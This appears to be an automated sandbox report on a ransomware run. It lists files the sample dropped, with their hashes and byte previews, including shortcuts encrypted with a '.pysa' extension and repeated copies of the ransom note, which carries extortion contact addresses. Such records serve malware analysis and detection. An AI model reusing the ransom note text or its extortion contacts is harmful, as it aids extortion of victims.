                  Preview: .........G`9[...{..Yb..v.d.".6.M.I..e.&..mU....^..p._SBlC)..*B..U..R`S.Mto.y..y$.M..1.N.}r:...<Vvc.["...Q.b....Ls ......q..Y..gM.....u.wK.).A..u9C...6.....E.@).q"..En..w.o.l... ...N=S8.|...U....s.\...c...h.R..#.^....U.B..f.V.@..z...`.qs.......d...hu+. .L.$..x.OT*......q....>...L.6.U.]..}...'.;.N.0.g.$...[4....'2...$..5.(.c.<m..M.ul[m#.-.D.s..../.9......T.?..H.V<I.l.%...&.'..B..+}.X`b..........J...D..s..V.............m.qUJ.x..}S..4(B....b....I..+2U/.......q...j.k...c.Z2!.....Yd..r]..B"HZR...a}.....FI......k'..4...c..u.;v.. *...\0<.....4..n...6..u.$G.<.i.?.#.}`......q.9..W...O._..B.Y...e&J..N.S.t...g@.9.99bf.3.4...v~=o.YL..m...~.M..O{..#.+o .}....\..=4pn.>.p..5O..29.c......z AX_!EYz..m............Yb...V..*..bWeM..B3.....8....<%...`...>..4..QM.2.....W..0<..d&A}..#r...f8.~'...x.k.S.P..*....s..Y.^..Rb..;.Zn..)_..... u..2n..w..<K%..',.-...y...>..._vR..[.>Pz......._I.5.Z.d>..}W.0....Zvq..7.s.R.`...b.y&*..Q...N...G,$. .t...5....w......Q:Z.j.Z.x....
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.796307126231862
                  Encrypted:false
                  SSDEEP:96:OVGxN9MDNJVsKQEyG+aurW3RSUzNqqdAmNjcJ9/80n:20NCDt5QEH+avRrNq9mNjUV3
                  MD5:283CDC14D96CB5A1F479168377722649
                  SHA1:AC39AA02BD9A97EB8056E366558AE1C562933072
                  SHA-256:60827E391340CE6739B769CC5AED2E0C4F957F8E2CB38530213CAEC6286A2A4A
                  SHA-512:DCA5D28F31423F1CEEA15EBD21FA65BCCF45FFDE2A3219FE9AC3D7310E402E2D6065F678786432E0FDD2E1715CE8928AF070495CBE16F9CA840D8A65F1C87C64
                  Malicious:false
                  Preview: .i.M...d..%<...d..LM.2..Xj..{.h.O...a...x_.W./.:.[......I..RkO..[.>qfE+...O.K..5..pHa.......}.....g..W0.4...%..g...8.....q@Y..\u?.F.U..P.D.e.-......W....kM.<'..u.......V.hMl|Ix8.....nt.)G...J+....K..........=...../...g..mnHO..Q.k.,B.#.a.L.H.{b.K<.c.......W.G.d..s.V@....<...{..=..s/.\...MU..../..J..w{......f.........._Z..z/JmL._.4....[..x.qT...}..R.n..\.......b/..4.{1.A.5C... ...T/\..h'g.........N...b$..q..[.......5QB.....R.5.O....</[.!...t...h4'._..T....qS..?.X.....]..\/.Q..O3..:.,........ .3...T.c.h%.f..m...<..eGa..P7b.....B"#.RhR.....\....... b.....0]...sgV.hk@...02..hEw.%....c.....![...KH...`i).8..................5....P.V.*.d.^.7.../.0..N...H.W.z...C...Ywy..8.D.....|f.^-R<.M..-.y.)U.F.~B.9../.NG.bs.r.N.........`._.{aY..(7......=...#....Tg.D..)..Hx.....h=.8.Qxjz.b.a..[.@.....J..t...(.j..*O.....@..2..Y.z...i.{]...[.....dS...".....5.F.P.l*..H.%.4.......9.k.,D.x.|..C."r...tG....u...\....G.."!..w....._...:H.S..... .C....~..@.0Z.zh...|..X9..E
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.070676217100435
                  Encrypted:false
                  SSDEEP:48:d/xWIIM/wIfiO3OA9/bvaauRCsvLNkM0zZvEzlSy+6qJUEMZqSTzYL9Ahr3UsSlY:JxWI3OibwzNkMEcz3PqJUE9PLmr3clJO
                  MD5:1B2056E4A0DB8F0346DFEBD9ECE48E3D
                  SHA1:F779E93C44A4F73A845A46D1C87B03BC4089D913
                  SHA-256:625F228E08F8ACACE60A6ED74D4A69685C3C169812397A945637265BB4516CA1
                  SHA-512:07030CCC2F3AAA93D641252F5B02F89FFCF7401299CC4007ECC4D8B2D3DFFBA84A9364DFFF662B1DBF4D5CF2E66CC02CA26E4B493CB996024E6FCF21E5BB2B92
                  Malicious:false
                  Preview: ......b.Q.FM..Z...p.0..|^......R`..=.G.........Cq....d.Ag.j;.+........X...D..k..2..#.8'......H..}.?.|po.(1...0..`...7a+..4xs..j..,.W.2....S...z..U..>9jq...7Lm..IJeI^.%.8....=.|.8..J^/5.[...$C..|.....q..o...\.$.......V..0!.O..mf..K;..}..1.1..$...b..HkB..v.Kk....S..a..#..,.J..l.2..p.N.J... ~..3..g.[.g....u.....^.7q....]e...Vwk...1.<......M.Q{7t.9.{*]....i8p^%.7..t.....&...x..n..W......j.{o....(..q.c.3.d...Qt.>...II*......}b(`.u...JXC.hv.X.T..........f...x>..@.....X..k..bv.HSF..Q.c..r.0c...~)..G....d.....j......M.m..`M.yC.S.UPC.trLh..............-..H.@@...s_....@...wxe.+..c1S......`?8L......,>.....,,r.......7ae._U~..k...x..^...m.....S.c.l_nC.:.4.#...YK...1n.U"]wQ....DV.......m......(>...h!...#..;u?...%..........V..Nq..|.0ZE.,v..8.u.. #..U.......]i.%."1..{..g.r.&...g..Q......@...h@.....f.p..4.X...4...<...B..e.^M..-.....F.........\..0..U..R...b!..?..l....G.{f..G._T..a2...z.mN..!...,v.H.....O....*.S...84.4.......n.?..?..o.+.G.F+
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.032015509367459
                  Encrypted:false
                  SSDEEP:48:wakE/1KnbhnBfAs5dsT5ks0MaPXll2T+x0Pcr7hXHtQsOLKu7lXbyumaLAPZTpo:wak6KntBos/0ml0T+mPcr5HvOLbWugtu
                  MD5:A54BED31892A9C51243A228B74F44A79
                  SHA1:1CE0CE14F3A5214E907C2CFBA679269D793B371C
                  SHA-256:64A4DE51EE3C4F3AE5D6D8EC051C92D11D4F3A9C1871679BCFF4471EDD3B1620
                  SHA-512:F3F4C424C8EF896C6985B6A70CD73D6CE454B39D6F4007FC416E78E3BB03B41766E1C7A1A1DE5C561D79197CFA4CD1432238F2D5B5601EE2F9014AD3C4B6745C
                  Malicious:false
                  Preview: .Q..../J*...N...M.W...gTXL.d$...|..D.F..F.A8..Tz....U..J.Mx..o.W..L.i..C8.dZ..NkM.P..W..S...>"0N.....^Y...nP.9.&@..c..+.B....M0..gx...z.).'.tr,l.Y..@...vN`..6[.=..5F%..q...'.i|!y.....I...F..b.\_...W.Pg..4.Y.] .*..oF..'d..3.....'.9....;.\.r.9..@.v........v.x.WV_.}.I......@...)..\..6@.i.3<0.vG.Gs..".eX.....7..eN.`8.7.a...C.Zy.M....$....>,.v .....N....x..RH.*...v..6..d.\...Xb....{..8....j-.N..X`{.......|..c3.|.G..pyp..%...J.H....o3..tE}.Qg}3...5..k.~..2 .....&..p.#...L...H...:-.y.U..%.p.....>...Y_....).......;h..t.pA.J..y[9ei.FT.n..H.....Y4....N?.,.X.X..R.<.M .".P....1.c./..[.E...1.~...Kr4..ul.....8.....R..~../.<...p..u.f.o..Y.$t..........d].]..d../J]..d........N..5-.U..Qy..<......o]..AT.........}.*6.C.C[..,.N.C`x."#.I ..5y.T....l,.m.M.p...C.k..>.<U.v,]Q.p....<.....c.....Fv[4WR..h.U.:o.0O.....v..C.6Fx|7.B..~.UT.........Ge...W......G......,..Mb..g..[.I......}..)oc.Cz4B.....F.<...JE.....4..J..G..BL.M..A..]pS;.B...1`Llt.j..v.,..X..!.....?.d
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.04922911868008
                  Encrypted:false
                  SSDEEP:48:i+f33Ath1uJpJgkvMXEABMH/myAjo9VOZZ6kfgBjOy3CbJdYwuYLGAeR9+XOqqGF:iG33A+UpBU7AiCZ6k8OiCLu19+eqqyqG
                  MD5:BB15FB05B3E1CD2D06AB5215B246E0B7
                  SHA1:318D87DA006F0D71C273437DB5B69722FCA023EE
                  SHA-256:BC976DEB75308D6F69DADB217E58C233E21062681B9A619FCB27B28E9530C04B
                  SHA-512:7FE50263796437E6431DCED75F1D941DFEA5FEA92015264A2492F12FFFC2C2659603E2783336B34A8263336CF35C3F3B7F8817233FB1710CF23FECC355BF9BA3
                  Malicious:false
                  Preview: F.P....-.M..f..........M..T....{.T...'h....fn...W..5.<..E.77.%!>=]....C]..{...{.V....%..ji...i.....C....{..!.?.1..>.0R.4.g..w..,}..y.F...9*.4...o..3Kc..Pd.......'1eP....b."...i..z.K.(...6.....@......b..$h..M..2..P>...0.4.i..p.U..r..-....8.....V..#./i.vI.7/..:.3..@.d.[w.~e .,CSIqqf7......9....d.!.\U(..x_.._..J..9.....l.u...d.......+.F..?.a72.R..p..:...W.......'.l...6..+YD..sz....+Xn.e...|.b.%O.V.y....h.>|.7G..-..(.e..].[.0.M...........^. S0g.5.=?..\.)gq..K.U6Dx}..WR...^]'.:.%.(Y.fS.....a..........P..{..|...l.....}....o.S...3..'.n......KS.....t.!.......u..q.5..SF..e...n.....,....D[.....t*....,..!b-.{.F..OZW..:X.A.k....zZ,F....9a..V.4...#.$..x...$S..|6t.8C..f.[.I.*.t.K.>W$.a_e..i."...,......8.?.%..}0.}....W...S....cIV....s.8X.?6~z..4*V.[.....\...........O....('..V..wt{....S}lT......t.-b..1_.......|5....U..%.$Q..D9..5.'..j^7-..^S.<.'H.....V..>|..>`...SP%.fj..9...g<J..u5.g.|.".......)..:y...+..>.'.p.z...7.9O..Z$.:...g#;..I....=.......*L..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.068156304831019
                  Encrypted:false
                  SSDEEP:48:5ZW8ftwYvo8wvd0DIQLwAa8a7EnM8kqnU68rX9WkBsZyIrK8oL76qBUVxBQnp+:C8ftwb8rDtLwAa8C/MN8D92Zy4RM76jV
                  MD5:009F2AC901F551379E113D7084302901
                  SHA1:4A5CE6F54BA9DFCE1953A06661B960BCADB4FF3A
                  SHA-256:A2C3AF9E24D7494D78FB7FF0354C85557D985DFDABD3035575A2DBBEC6ADB58C
                  SHA-512:DFE54B220A9DF5D6AFB9107D0A103822E11ACDF725F53F58BE4196552A3964C516BF947D8B307AA850A83E181C206FDB5AE4C1E087DE15E83ADB2C3509E82B31
                  Malicious:false
                  Preview: 1l\j0Q1g..jN=/Y..te....)%v..;`o.fiv.$.-..s...;.".z.0J.s.?...\.HM.y>].}..J....9...f.qBn:*=..... ]..{.....\.\.m.......(.uM..Y..|...in<7..../...Y.m....p(C`......:0...=E..&B-.,.@.,...p .*...b.e$u.K.L..r..}.q0=.(Tcn...').......[&.|.,.2...u..%......g.>.H....WOvlS......;.....Q#...wS...."%..S.R....c/.H.....w.....6....K....A....1......3....Y..}&w+....+...3<.....m:.}nw..,.dL.*..}8.@*.......^l... [q..p&.>.?1q..^.......z,.#..\.:..9X...?.eZ..)..4.a..^.w(.Q..KA.n....._..8..bZ...8_..b.?..l.{..s..%6....}..h......Z....b...W`..>....5..k......!.0t.p.[..Yd...._i:...Q\.....Y(..\....0..!.}..C.....cKH..c..nU..GwYT..5E..A...,.D.c.D8.}+.......*.._^.........W.S..].>...z..$...T.:......./....*.Z\,............v......0.i.X2.t...@<T..E.O.kn...<......j}..?.U.]~K4.6.a=.v.#.....R.n.......,..HH{.>..#........I.csk S..4..VI........_.m............u.../Vy./[Y.....r...}x.e]g.6..@....C....%.}...7..G.0.s.eW............A...xD.....?.....)V..C.6E?.C.........U..A.%r./..O...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.050052499100622
                  Encrypted:false
                  SSDEEP:48:wXYD0nBPgYyE2aqfL/OrPO/PzZyiKRgFdnO+jmbddMM14ZY0Oar2DUYLSaEeCNBZ:tgIrL/O6/bZyi9POfdl1x1aKXLse1jl8
                  MD5:991E914DD87BB55BA1CE106953FB1F8F
                  SHA1:12D3DA11C224783A9069484861895B53AD0978B1
                  SHA-256:B7627D2F760B0E5DF93166C39959A0D1517C32C7574D14C28B2EFAC7E8734AEC
                  SHA-512:A7E277D79B7BB30DEBE01F01EE2F6B338E040EBCACD2EE339590DB35EEA62B89F5DFA3DE699346983348A1E07AA2C1FC5184947343B8B3E13729C361EEB705D4
                  Malicious:false
                  Preview: jh]..W"q".h..c._.r..A.5......n%."......R.5..W.D:B..QN.....:^..piy`.....~.s.3&^$..u.e.Z..8..Q...%.G.P..8.\...7sS:.........._#...I.*.f[...z*.Zq7....O.3.<w...c..'!..a........_.4x........\c.Dq...v...q..............3...dc.....Z=<.Kf.F...r.*<.q..\..w....q.Wm...y.b.!...}.._0.[..i.?.>.@.>p.7Hf(.....(%OK;......i.\...=.6+r.i.9..&..*W....E....M.z.D.gY....WK..n.'...#^......"gU....hU|.........7.g...<..p..cW..f,Rf....Z...0......+.....YQM..+..7\....[".^?..f...8{.K.qh...%...W..:..6....5.r.P...".{.G}.{.'.uEh./..[X.l..k.V....=M...b..FC.g.X.U6.+)..%.-I..].H.T..]...l.\........G.W(. r..:........A..p.H|.B.cW;....:q...p_0......yd.*..Vb.^mn.Q.g<..>..L8ZiY..\+.{.=....4HGv.#f.v...S.....>..a.{..5.e2.k.{rB....)(....Q..T1...x..".$.8)..;m6..zC.Z5..F.1.2{.4....H.rH.M...R...?....k{W..c, ...3?.....MGn...I.........$.q......v*..`..QC..].H..]b...Z.P\v...4..c@|.........6.,....A.~P......^....3..../.tdWj6.qF=.'Ts..e......A...z.5P:P.j.:]..8....x.<_q..v.\.I.z{...y...d^.{Q...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.062346453510331
                  Encrypted:false
                  SSDEEP:48:eTOJXPCqpsGDc0eRHUZQxMpFpb4RMeHtnSfp8jwEQHzgNGPUyZ0jwb50K6LXojAg:eqtaGgZFxu6RjtSfy7QTKqj6w10nLuC6
                  MD5:93533EBE901565D997809E6099D335B0
                  SHA1:8B1A3F37DFEF713847EE3B97679456BB9CBBB3BE
                  SHA-256:9D84C1A0CA068486C7C0A216058CCFBEB043FDBD407A9DCFE3723C9ADA9E8304
                  SHA-512:C0365696ABDDF4619DE7CDC352EA1F83476E00F919CA283315DF269D865AC5762FEDA9323C2242255BC3CAC02BB9C61B0F1C05CC9491DB23AF51718F5D5C9305
                  Malicious:false
                  Preview: H/.W..JL.&+2..`P4.E....)..(3._..p..4.0j.X..n+R.~.9.<g5m..w.K.@..e....T.TM.N...t.W...w...j....y..=...E..16*.B..C...ND....bu...2E.....G@...O.0.M..P..W>.......p.D.1.7.).z..bci,..p._k..H... f.....A.....q..~XQ6Z............:.....c.-...:$.N..e.u@.@..+ B.....o.0.JM._fN.......P{J.B^..m......x....\.C...'?..yrcb._..{H....'.....).|)........."K}...xZ..(G..I..gm..."1:....Lw.#h..}8(a...w6.'...l.>.Y^~*.L.R~(.....N.?..4.'9ft.~.}^..M...c..Y.C..=..ic...=..D...om).3-...W-...........u.........2.iU.o......Ks.YZ%.5g6.-`...N..0......P.q..^.E.II>=y.4U]|H..>........Z..r.......3....W......G>/..r..bU$.UlPS...#....j....s......1u.2.x..j.[C...1*.Yzj..aF.!.@.n..5&.RW..........@)]......}...Jrn.I]A.)j..fU....;..O......A...M.....a...h..8$a....};].........#.x.........{B..:...gc...$.|..T...`.PeZ..W[..1..k&.G......~....b.`..c..O..Zj3;e....'..A..n.<...G._I{U..Z...!Zd..v.T.,.7...cK..J.W....l..@}@=q:....7g..s..-...+.}.r$s.......E.4.....\9...7u.....7.%..=...?.....z..@.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.081993942718598
                  Encrypted:false
                  SSDEEP:48:XW6x5IwcbgN2maG3ACMyHAtKG01a+jYPrU9ceMtcqT21mmyaQWNezi9BlOHHdg:jRKgTaGwCMygtKG06PrUSrmqT21mmyav
                  MD5:7070F75FE4D86AD563E9ACCAF654ADE8
                  SHA1:021AE370A622925799BC031FBAE9018723759C96
                  SHA-256:C13BF26406B0252FA433768127E4CA6B1A9609C7E1DACCB5978874B8C633963F
                  SHA-512:719ED40A3E818BA847360C7A876A942F53F55932A0E9BF3C351B47080094E197434513A1650EDDA20FE1E6B2E6A4D9FA9188DFB8E23F96F2D9D36608860A1483
                  Malicious:false
                  Preview: ...........hrEl.I.V0R..........q|......-.M.. ).....C.#._}..]..d..../('.S#17......f....,.........%.|..C...K.....&Dd....A..`.....Sd1M..nt..o.....Gd.....!...H..pL.._.1...y...^../H...N]....R...{ii....2..:...Z..x..O8..d.....b...".A.V..y...7.=...G..$.........JG7.7...v#..^$#\.....2...v=.x*l.m...\.<..D..n....v.r.gB..~......g..Z:#/%...~..|-}.."`..'1...B.ayw..ny..q.&.<k.?pa.....((.Z.<.@..@...<.NQ~...q.".H.>..z...R.\.I.=B.X...}.LD..>..]lK...... w.N.k.I...w.qs....zd............&..o\.pe*....j>...<[c2C.z^1.!..F....mi...Kon{.EI.@m..IP[.b">...........d.......<...e.....!..g~..+.=..J.b.X.=.~...;..2*..Yn....0.@|.S.m|.N.v...5.k.4..%UP...4...#.0.....!.....7q...S..S..~j.e..'[Z..,...o..o<x......wtt..JA`i..j.qn...?M~..%..q....X.&.0.yA ..J:;=.mF.R..2.^.J.!...'..6RL...('..f...O...{0..d.5@......y..fc.^.W#...>.O....P..T..m.8.-0.x........a.vw...}.. ".....3W.......p..AhQM.R.........c/.w.T.X.......7.......EH9%.*..o..[..d...*.Y..../..........I...R.:.^;a..6..y.....k....._.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.062607384342852
                  Encrypted:false
                  SSDEEP:48:wDt2prNZxgmqs7nyObw31SH/lGtUzVsKfVqCNJkLExmby+itUiHKey:SYHgmqibw31SfiUzV1JJNmbhCKH
                  MD5:9C2D6B6AF9925C1553BF0BA5DD461A10
                  SHA1:D29280F2B92C6D7D12729DE4F40F57CD7DBC174C
                  SHA-256:735379C3F4E28638B4D18BBA3475F409C2634B87D701F6C4F724BD97C4752773
                  SHA-512:5D3F1FD9167717C21676BD894B1551D902C80640034692F609CE652F3731CC1454EE3DCBB77A7991D103837540ABCA5B82CED5E367E1494BB15FF2453B0D1C62
                  Malicious:false
                  Preview: ..@.M...mk.HH6*/...P..k.......RK.n..`.o.....#DG......3g........V.|..Yl._...V.L../.A=?fW..E...T..pY. .).....#.F.......n.......JC......,.p...V.....(..-.CQrYb..,..)dq!.L..N.W...w"PP...*.E..f.......s...vr.r...(..~........z..'....z.a..Sn..I.2....~A...:dW...<.?r..S.5~..}..|.....v..E.l0.DWR.]}..6*....:.>~.[.9. #U`~2..=........w8.7.'......dU....*..<...h....S..C.(.x[......|.N....q."*..QP..i@...6.I`..^..E.&$.W.0.8.....Y$..(.yh4...=.......F....JH.......=I../;.o...IxL..a..7q!......Dg...*}...[U}-....x..[.. ...`.S..."Xe.X.9 ........J....N..^.^.tw....%.6...u...8...>....f...,W..J.Z........<.Q.._.g^.|.x.PA...G...{.9..G....J..p.l..+.?T.S.6.S.sk.....f...C..I.....BOfp....l.s...o.N.e.}.A.Q...3e..!O.G.....F>.7..\?$r....|....\...3...C.H..v..\.U."..U.c.dH.P...j .B.J.z....`%.b..0fsh.kH.....~..FP<.r._.^ApVi.w.0..A.>.0b...*..V....A...p.d..f...b....-..N.a,....+.vB..E2...B. #...f.\.=._.BOQ .....`..q.....#.O?l...........H...n........T[Km.0"..Y...x:A.......P
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.057156757460325
                  Encrypted:false
                  SSDEEP:48:C7Eh2719qE5vo+pqEGmightsM6W/jxCnJPPEELg4GWQ55fXPCGdPwLBLyJ9:C4aDZA8BiMsM6W/jIJPcSVGW6h6MeBL+
                  MD5:7A5F56229A94CF21E1C722292367272B
                  SHA1:B9B6A081227D250BC715F2512ECEF64BD8369AE8
                  SHA-256:DA7734031D4AFF22820A604B4D89F00FB77078583D3F24B053BD22750420D916
                  SHA-512:914975A5C24BB3A852424E55C5BFA1ECBA6498A3229B9D651E163B52DF727E1190D799D7000791CF54497AD542563A7032C2DF297125A154D9407A7FF4024F17
                  Malicious:false
                  Preview: ....q!...Q.j....|..Gbq...\1:..il.(WR4..@..1=G2#vbK..../...:m.=+.Z...oe:.-l.........,.=....e.]....|.zd....]..n._$&.].08...B.....ZX.+X.h..F..YHr.n..j.~......C>t...&.....:d..b-Bn..L......r..o..sDy..j.........>.m...V...@+R.I.HDM...Qt;M.1.....m23.W..Z...;....&M.s.ZS4...E\.Y-.E.V...u....:".P.".E......@..+.....N.E./A..U......K{...Z..zVd...x...B.c..). .9..i...........#.....a0@..C..,......Y.B....w..>.......p8[......O.q.m.{..C.K .."..N..|.....1.{....B...[+.K.......?.+Y..:........hD;.[..W:3.W:+.W..).....n...G*9...K.X. ....>wR.....$.C...x-?..:..^n|........l.....w.+E.\.nY.7.Z;...Hej..j..q`.t....`N..F.$e..G...........N....M....OK.g.iz!........p...7..Q.m*.2...*....?okO....G.....8=3......3......<.c(r......\.ZvYxF...f.(.8.,^...D.._.*...|....7..[k..._.UPf...5.,pK.d5..\~.}..np.J..;..."t...8..O.l..............QPR.....b..^.v..N..;.K...~.s~T...Dp..h.......5(}.....Cf...D.....6nY.......p..2x..!!...FX8.[.....S..T.?12..l.r...a.T.....I....:.....5cH.Z...D`...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk.pysa
